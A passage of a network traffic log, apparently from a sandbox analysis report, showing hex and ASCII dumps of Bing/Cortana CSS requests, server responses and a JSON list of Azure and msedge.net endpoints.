2024-09-26 15:55:37 UTC	4096	IN	Data Raw: 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 71 31 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 2d 72 69 6e 67 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 63 2d 72 69 6e 67 2d 66 61 6c 6c 62 61 63 6b 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 63 76 6c 30 32 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 7d 2c 7b 22 65 Data Ascii: y-opaph.netmon.azure.com","w":3,"m":128},{"e":"cq1prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"c-ring.msedge.net","w":2000,"m":3},{"e":"c-ring-fallback.msedge.net","w":50,"m":3},{"e":"cvl02prdapp01-canary-opaph.netmon.azure.com","w":3,"m":1},{"e
2024-09-26 15:55:37 UTC	4096	IN	Data Raw: 3a 22 66 72 61 32 32 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 66 72 61 32 33 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 66 72 61 32 33 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 67 72 61 70 68 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22 2c 22 77 22 3a 31 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 67 72 61 70 68 2e 61 7a 75 72 65 66 64 2e 6e 65 74 Data Ascii: :"fra22prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"fra23prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"fra23prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"graph.azurefd.net","w":1,"m":1},{"e":"graph.azurefd.net
2024-09-26 15:55:37 UTC	4096	IN	Data Raw: 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6f 2d 72 69 6e 67 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 31 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 6f 2d 72 69 6e 67 2d 66 61 6c 6c Data Ascii: },{"e":"nag20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":1},{"e":"nag20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"nag20prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"o-ring.msedge.net","w":100,"m":3},{"e":"o-ring-fall
2024-09-26 15:55:38 UTC	3936	IN	Data Raw: 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 34 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 35 61 7a 66 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 75 73 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 35 61 7a 66 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 75 73 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 37 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 Data Ascii: canary.netmon.azure.com","w":3,"m":128},{"e":"sn4prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"sn5azfapp01-canary.netmon.azure.us","w":3,"m":128},{"e":"sn5azfapp02-canary.netmon.azure.us","w":3,"m":128},{"e":"sn7prdapp01-canary-opaph.netmon.azure

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.16	49816	23.1.33.206	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:38 UTC	791	OUT	GET /rb/1a/cir3,ortl,cc,nc/eNojzGTgc6FFJi_kGAzzghOMEG4.css?bu=B8ECRa8ClwFaWswC&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
2024-09-26 15:55:38 UTC	1209	IN	HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Thu, 05 Sep 2024 19:08:48 GMT X-EventID: 66edcc59a5e347a0999c9fe1f46d2c72 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: BNZEEAP00016A87 X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=314837 Expires: Mon, 30 Sep 2024 07:22:55 GMT Date: Thu, 26 Sep 2024 15:55:38 GMT Content-Length: 6058 Connection: close Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.98200117.1727366138.be92b12 Timing-Allow-Origin: *
2024-09-26 15:55:38 UTC	6058	IN	Data Raw: 2e 62 5f 73 65 61 72 63 68 62 6f 78 53 75 62 6d 69 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 72 70 2f 34 69 5a 49 7a 5f 6f 41 4c 31 79 70 37 64 69 5f 36 44 39 65 32 65 6e 58 69 4d 4d 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 2d 34 32 70 78 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 33 32 30 70 78 20 33 38 70 78 7d 2e 62 5f 6c 6f 67 6f 7b 77 69 64 74 68 3a 32 32 70 78 3b 68 65 69 67 68 74 3a 33 37 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 62 5f 6c 6f 67 6f 3a 61 66 74 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 64 Data Ascii: .b_searchboxSubmit{background:url(/rp/4iZIz_oAL1yp7di_6D9e2enXiMM.png) no-repeat -42px 0;background-size:320px 38px}.b_logo{width:22px;height:37px;position:relative;display:inline-block;overflow:hidden;direction:ltr}.b_logo:after{position:absolute;top:0;d

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.16	49817	23.1.33.206	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:38 UTC	780	OUT	GET /rb/3F/ortl,cc,nc/4-xJy3tX6bM2BGl5zKioiEcQ1TU.css?bu=A4gCjAKPAg&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
2024-09-26 15:55:38 UTC	1210	IN	HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Thu, 07 Dec 2023 22:46:03 GMT X-EventID: 66e2ba79b3f5496383449854055460e1 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: BNZEEAP0002305F X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=367970 Expires: Mon, 30 Sep 2024 22:08:28 GMT Date: Thu, 26 Sep 2024 15:55:38 GMT Content-Length: 15967 Connection: close Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.95200117.1727366138.b87bf56 Timing-Allow-Origin: *
2024-09-26 15:55:38 UTC	15174	IN	Data Raw: 68 74 6d 6c 7b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 62 6f 64 79 5b 64 69 72 5d 20 74 61 62 6c 65 2c 62 6f 64 79 5b 64 69 72 5d 20 74 64 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 22 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 53 61 6e 73 2d 53 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 62 6f 64 79 5b 64 69 72 5d 7b 6d 61 72 67 69 6e 3a 30 7d 62 6f 64 79 20 2e 74 61 6c 6c 55 78 7b Data Ascii: html{-ms-user-select:none;overflow-y:hidden;overflow-x:hidden;cursor:default}body[dir] table,body[dir] td{margin:0;padding:0}body{font-size:15px;line-height:20px;font-family:"Segoe UI",Arial,Helvetica,Sans-Serif;color:#000}body[dir]{margin:0}body .tallUx{
2024-09-26 15:55:39 UTC	793	IN	Data Raw: 74 28 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 29 3a 6e 6f 74 28 2e 63 6f 72 74 61 6e 61 49 63 6f 6e 29 20 2e 69 63 6f 6e 20 69 6d 67 7b 77 69 64 74 68 3a 31 33 70 78 3b 68 65 69 67 68 74 3a 31 33 70 78 7d 2e 61 73 50 61 64 64 69 6e 67 20 2e 64 6f 75 62 6c 65 4c 69 6e 65 20 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 3e 2e 69 63 6f 6e 7b 6d 69 6e 2d 77 69 64 74 68 3a 34 34 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 34 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 70 78 7d 62 6f 64 79 5b 64 69 72 5d 20 2e 61 73 50 61 64 64 69 6e 67 20 2e 64 6f 75 62 6c 65 4c 69 6e 65 20 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 3e 2e 69 63 6f 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 36 70 78 7d 2e 61 73 50 61 64 64 69 6e 67 20 2e 6e 6f 72 6d 61 6c 69 7a 65 64 42 69 67 Data Ascii: t(.secondaryIcon):not(.cortanaIcon) .icon img{width:13px;height:13px}.asPadding .doubleLine .secondaryIcon>.icon{min-width:44px;min-height:44px;max-height:44px}body[dir] .asPadding .doubleLine .secondaryIcon>.icon{padding-top:6px}.asPadding .normalizedBig

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.16	49818	23.1.33.206	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:39 UTC	910	OUT	GET /rb/6j/cir3,ortl,cc,nc/_McBPQ_9mTftkbN3lEsLB5a8qvg.css?bu=MsIKvArICrwKrAu8CrILvAq8Cr0LvArEC7wKygu8CtALvArWC7wK2gq8CuAKvArUCrwKvAqjC7wK7wq8CvUKvArpCrwKvAqFC4gLvAq8CqALjgu8CpQLlwu8Cv8LvArcC7wKrQw&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
2024-09-26 15:55:39 UTC	1247	IN	HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Wed, 14 Jul 2010 01:24:58 GMT X-EventID: 66f5155ba5cb4c19866166ce1707a20d UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: BNZEEAP00016A8B X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=403698 Expires: Tue, 01 Oct 2024 08:03:57 GMT Date: Thu, 26 Sep 2024 15:55:39 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.8a200117.1727366139.4467352 Timing-Allow-Origin: *
2024-09-26 15:55:39 UTC	15137	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 40 6b 65 79 66 72 61 6d 65 73 20 61 6c 67 6f 50 6c 61 63 65 68 6f 6c 64 65 72 53 68 69 6d 6d 65 72 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 30 30 25 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 25 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 2d 6d 6f 7a 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 2d 6f 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a Data Ascii: 00006000@keyframes algoPlaceholderShimmer{0%{transform:translateX(-100%)}100%{transform:translateX(100%)}}@keyframes fadein{0%{opacity:0}100%{opacity:1}}@-moz-keyframes fadein{0%{opacity:0}100%{opacity:1}}@-o-keyframes fadein{0%{opacity:0;}100%{opacity:
2024-09-26 15:55:39 UTC	9451	IN	Data Raw: 65 6e 75 2d 69 74 65 6d 5f 64 65 74 61 69 6c 73 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 38 70 78 7d 62 6f 64 79 5b 64 69 72 3d 27 72 74 6c 27 5d 20 2e 63 6f 6e 74 65 78 74 4d 65 6e 75 20 2e 6d 65 6e 75 2d 69 74 65 6d 5f 64 65 74 61 69 6c 73 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 38 70 78 7d 2e 63 6f 6e 74 65 78 74 4d 65 6e 75 20 2e 64 69 76 69 64 65 72 7b 62 6f 72 64 65 72 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 62 6f 64 79 5b 64 69 72 5d 20 2e 63 6f 6e 74 65 78 74 4d 65 6e 75 20 2e 64 69 76 69 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 34 70 78 20 31 32 70 78 7d 2e 64 61 72 6b 54 68 65 6d 65 20 2e 63 6f 6e 74 65 78 74 4d 65 6e 75 20 2e 64 69 76 Data Ascii: enu-item_details{padding-left:28px}body[dir='rtl'] .contextMenu .menu-item_details{padding-right:28px}.contextMenu .divider{border:0;border-top:1px solid rgba(0,0,0,.2)}body[dir] .contextMenu .divider{padding:0;margin:4px 12px}.darkTheme .contextMenu .div
2024-09-26 15:55:39 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 74 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 33 36 70 78 20 2b 20 31 32 70 78 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 7d 62 6f 64 79 5b 64 69 72 5d 20 23 6c 6f 61 64 69 6e 67 53 63 72 65 65 6e 2c 62 6f 64 79 5b 64 69 72 5d 20 23 63 6f 70 69 6c 6f 74 4c 6f 61 64 69 6e 67 53 63 72 65 65 6e 7b 6d 61 72 67 69 6e 3a 31 32 70 78 20 31 32 70 78 20 30 20 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 32 70 78 7d 2e 64 61 72 6b 54 68 65 6d 65 20 23 6c 6f 61 64 69 6e 67 53 63 72 65 65 6e 2c 2e 64 61 72 6b 54 68 65 6d 65 20 23 63 6f 70 69 6c 6f 74 4c 6f 61 64 69 6e 67 53 63 72 65 65 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 Data Ascii: 00006000t:calc(100% - 36px + 12px);background-color:#fff;box-sizing:content-box}body[dir] #loadingScreen,body[dir] #copilotLoadingScreen{margin:12px 12px 0 12px;padding-top:12px}.darkTheme #loadingScreen,.darkTheme #copilotLoadingScreen{background-color
2024-09-26 15:55:40 UTC	8204	IN	Data Raw: 3a 6e 6f 6e 65 7d 62 6f 64 79 5b 64 69 72 3d 27 6c 74 72 27 5d 20 2e 74 6f 70 52 65 73 75 6c 74 73 20 2e 73 75 67 67 65 73 74 69 6f 6e 2e 74 6f 70 52 65 73 75 6c 74 54 65 6d 70 6c 61 74 65 49 6e 47 72 6f 75 70 73 20 2e 73 75 67 67 44 65 74 61 69 6c 73 43 6f 6e 74 61 69 6e 65 72 2c 62 6f 64 79 5b 64 69 72 3d 27 6c 74 72 27 5d 20 2e 74 6f 70 52 65 73 75 6c 74 73 20 2e 73 75 67 67 65 73 74 69 6f 6e 2e 77 69 74 68 4f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 20 2e 73 75 67 67 44 65 74 61 69 6c 73 43 6f 6e 74 61 69 6e 65 72 2c 62 6f 64 79 5b 64 69 72 3d 27 6c 74 72 27 5d 20 2e 67 72 6f 75 70 20 2e 74 6f 70 52 65 73 75 6c 74 54 65 6d 70 6c 61 74 65 49 6e 47 72 6f 75 70 73 2e 73 75 67 67 65 73 74 69 6f 6e 2e 77 69 74 68 4f 70 65 6e 50 72 65 76 69 65 77 Data Ascii: :none}body[dir='ltr'] .topResults .suggestion.topResultTemplateInGroups .suggDetailsContainer,body[dir='ltr'] .topResults .suggestion.withOpenPreviewPaneBtn .suggDetailsContainer,body[dir='ltr'] .group .topResultTemplateInGroups.suggestion.withOpenPreview
2024-09-26 15:55:40 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 2c 2e 6f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 6f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 20 2e 70 72 65 76 69 65 77 4f 70 65 6e 65 64 49 63 6f 6e 2c 2e 6f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 20 2e 6f 70 65 6e 50 72 65 76 69 65 77 49 63 6f 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 70 72 65 76 69 65 77 50 61 6e 65 4f 70 65 6e 65 64 20 2e 6f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 2c 2e 70 72 65 76 69 65 77 50 61 6e 65 4f 70 65 6e 69 6e 67 20 2e 6f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e Data Ascii: 00004000,.openPreviewPaneBtn{align-items:center;justify-content:center}.openPreviewPaneBtn .previewOpenedIcon,.openPreviewPaneBtn .openPreviewIcon{display:none}.previewPaneOpened .openPreviewPaneBtn,.previewPaneOpening .openPreviewPaneBtn{display:none}.
2024-09-26 15:55:40 UTC	12	IN	Data Raw: 66 61 64 65 69 6e 7b 30 25 7b 0d 0a Data Ascii: fadein{0%{
2024-09-26 15:55:40 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 2d 6f 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 6f 6f 70 69 6e 67 52 6f 74 61 74 65 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 28 30 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 28 30 29 7d 7d 40 6b 65 79 Data Ascii: 00004000opacity:0}100%{opacity:1}}@-o-keyframes fadein{0%{opacity:0;}100%{opacity:1;}}@-webkit-keyframes fadein{0%{opacity:0}100%{opacity:1}}@keyframes loopingRotate{0%{transform:rotate(0deg) translate(0)}100%{transform:rotate(360deg) translate(0)}}@key
2024-09-26 15:55:40 UTC	12	IN	Data Raw: 2d 61 63 63 65 6e 74 31 29 7d 0d 0a Data Ascii: -accent1)}
